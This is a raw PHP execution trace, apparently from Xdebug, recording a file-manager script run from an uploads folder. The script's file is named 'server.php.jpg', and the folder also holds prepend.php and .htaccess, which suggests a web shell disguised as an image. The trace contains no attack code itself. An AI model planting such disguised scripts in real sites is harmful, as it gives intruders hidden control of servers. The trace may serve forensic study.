4	163	0	0.008746	800248	textfieldsize	1		/var/www/html/uploads/server.php.jpg	1439	1	'/var/www/html/uploads/'
4		A						/var/www/html/uploads/server.php.jpg	1575	$size = 27
4		A						/var/www/html/uploads/server.php.jpg	1576	$size = 30
4	163	1	0.008794	800248
4	163	R			30
4	164	0	0.008812	800280	html	1		/var/www/html/uploads/server.php.jpg	1439	1	'/var/www/html/uploads/'
5	165	0	0.008829	800280	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'/var/www/html/uploads/'	2	NULL
5	165	1	0.008849	800552
5	165	R			'/var/www/html/uploads/'
4	164	1	0.008871	800440
4	164	R			'/var/www/html/uploads/'
4	166	0	0.008891	800376	word	1		/var/www/html/uploads/server.php.jpg	1440	1	'change'
5	167	0	0.008909	800376	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'change'	2	'UTF-8'
5	167	1	0.008929	800648
5	167	R			'change'
4	166	1	0.008960	800536
4	166	R			'change'
3	159	1	0.008981	800056
3	168	0	0.008989	800056	is_writable	0		/var/www/html/uploads/server.php.jpg	1205	1	'/var/www/html/uploads/'
3	168	1	0.009016	800096
3	168	R			TRUE
3	169	0	0.009036	800056	upload_box	1		/var/www/html/uploads/server.php.jpg	1206	0
4	170	0	0.009054	800120	word	1		/var/www/html/uploads/server.php.jpg	1452	1	'file'
5	171	0	0.009071	800120	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'File'	2	'UTF-8'
5	171	1	0.009091	800392
5	171	R			'File'
4	170	1	0.009108	800280
4	170	R			'File'
4	172	0	0.009126	800248	word	1		/var/www/html/uploads/server.php.jpg	1454	1	'upload'
5	173	0	0.009142	800248	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'upload'	2	'UTF-8'
5	173	1	0.009162	800520
5	173	R			'upload'
4	172	1	0.009180	800408
4	172	R			'upload'
3	169	1	0.009198	800056
3	174	0	0.009207	800056	create_box	1		/var/www/html/uploads/server.php.jpg	1207	0
4	175	0	0.009224	800216	word	1		/var/www/html/uploads/server.php.jpg	1467	1	'file'
5	176	0	0.009241	800216	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'File'	2	'UTF-8'
5	176	1	0.009260	800488
5	176	R			'File'
4	175	1	0.009278	800376
4	175	R			'File'
4	177	0	0.009295	800280	word	1		/var/www/html/uploads/server.php.jpg	1468	1	'directory'
5	178	0	0.009312	800280	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'Directory'	2	'UTF-8'
5	178	1	0.009332	800552
5	178	R			'Directory'
4	177	1	0.009350	800440
4	177	R			'Directory'
4	179	0	0.009368	800440	word	1		/var/www/html/uploads/server.php.jpg	1471	1	'create'
5	180	0	0.009385	800440	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'create'	2	'UTF-8'
5	180	1	0.009404	800712
5	180	R			'create'
4	179	1	0.009421	800600
4	179	R			'create'
3	174	1	0.009439	800056
3	181	0	0.009448	800056	sortlist	1		/var/www/html/uploads/server.php.jpg	1213	3	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]	'filename'	FALSE
3		A						/var/www/html/uploads/server.php.jpg	907	$dirs = []
3		A						/var/www/html/uploads/server.php.jpg	908	$files = []
3		A						/var/www/html/uploads/server.php.jpg	910	$i = 0
4	182	0	0.009585	800056	sizeof	0		/var/www/html/uploads/server.php.jpg	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	182	1	0.009674	800088
4	182	R			6
3		A						/var/www/html/uploads/server.php.jpg	911	$dirs[] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.php.jpg	910	$i++
4	183	0	0.009740	800432	sizeof	0		/var/www/html/uploads/server.php.jpg	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	183	1	0.009827	800464
4	183	R			6
3		A						/var/www/html/uploads/server.php.jpg	911	$dirs[] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.php.jpg	910	$i++
4	184	0	0.009892	800432	sizeof	0		/var/www/html/uploads/server.php.jpg	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	184	1	0.009984	800464
4	184	R			6
3		A						/var/www/html/uploads/server.php.jpg	912	$files[] = ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
3		A						/var/www/html/uploads/server.php.jpg	910	$i++
4	185	0	0.010050	800808	sizeof	0		/var/www/html/uploads/server.php.jpg	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	185	1	0.010136	800840
4	185	R			6
3		A						/var/www/html/uploads/server.php.jpg	912	$files[] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.php.jpg	910	$i++
4	186	0	0.010201	800808	sizeof	0		/var/www/html/uploads/server.php.jpg	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	186	1	0.010286	800840
4	186	R			6
3		A						/var/www/html/uploads/server.php.jpg	911	$dirs[] = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.php.jpg	910	$i++
4	187	0	0.010350	800808	sizeof	0		/var/www/html/uploads/server.php.jpg	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	187	1	0.010436	800840
4	187	R			6
3		A						/var/www/html/uploads/server.php.jpg	912	$files[] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/server.php.jpg	910	$i++
4	188	0	0.010500	800808	sizeof	0		/var/www/html/uploads/server.php.jpg	910	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	188	1	0.010586	800840
4	188	R			6
4	189	0	0.010603	800832	sizeof	0		/var/www/html/uploads/server.php.jpg	915	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
4	189	1	0.010656	800864
4	189	R			3
